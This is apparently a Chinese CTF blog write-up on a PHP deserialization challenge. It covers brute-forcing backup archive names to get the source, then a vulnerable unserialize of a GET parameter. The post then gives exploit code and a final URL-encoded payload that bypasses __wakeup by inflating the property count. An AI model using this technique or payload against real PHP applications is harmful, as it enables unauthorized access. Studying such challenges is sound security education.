2021-08-25 PHP(php反序列化)

本文详细介绍了PHP反序列化漏洞的利用过程,包括如何爆破备份文件,寻找可利用的代码段。在给定的代码示例中,通过构造特定的序列化字符串,绕过了__wakeup()函数的限制,成功触发了条件,获取了flag。文章还展示了构造payload的步骤,并给出了最终的攻击payload。
摘要由CSDN通过智能技术生成

PHP(php反序列化)

已进入题目就告诉我有备份,所以直接爆破备份文件
在这里插入图片描述爆破的时候就直接在网站后跟xx.xx,两个地方爆破,记得在中间加.

在这里插入图片描述常见的文件名有
web,website,backup,back,www,wwwroot,temp

在这里插入图片描述常见的后缀名有tar,tar.gz,zip,rar
在这里插入图片描述爆破后根据回显的长度判断是www.zip
在这里插入图片描述
下载备份的网站源码
在这里插入图片描述查看index.php中有这么一行,所以是get传入select值,然后反序列化

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>

然后class.php中如下,只要满足username是admin,password是100就可以输出flag

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

可以自己构造满足条件的Name对象,但是有一个__wakeup函数,会在反序列化前自动调用,会修改username的属性值,要绕过wakeup,可以修改属性个数。所以exp如下

<?php

class Name{
    private $username;
    private $password;

    public function __construct(){
        $this->username = 'admin';
        $this->password = 100;
    }

}

$evil = new Name;
echo(serialize($evil)); 

?>

因为是private属性,会是%00类%00属性的形式,而%00是无法显示的字符,可以提前urlencode

echo(urlencode(serialize($evil))); 

最后如下:

在这里插入图片描述配合上修改属性个数,payload如下:

select=O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D

得到:
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值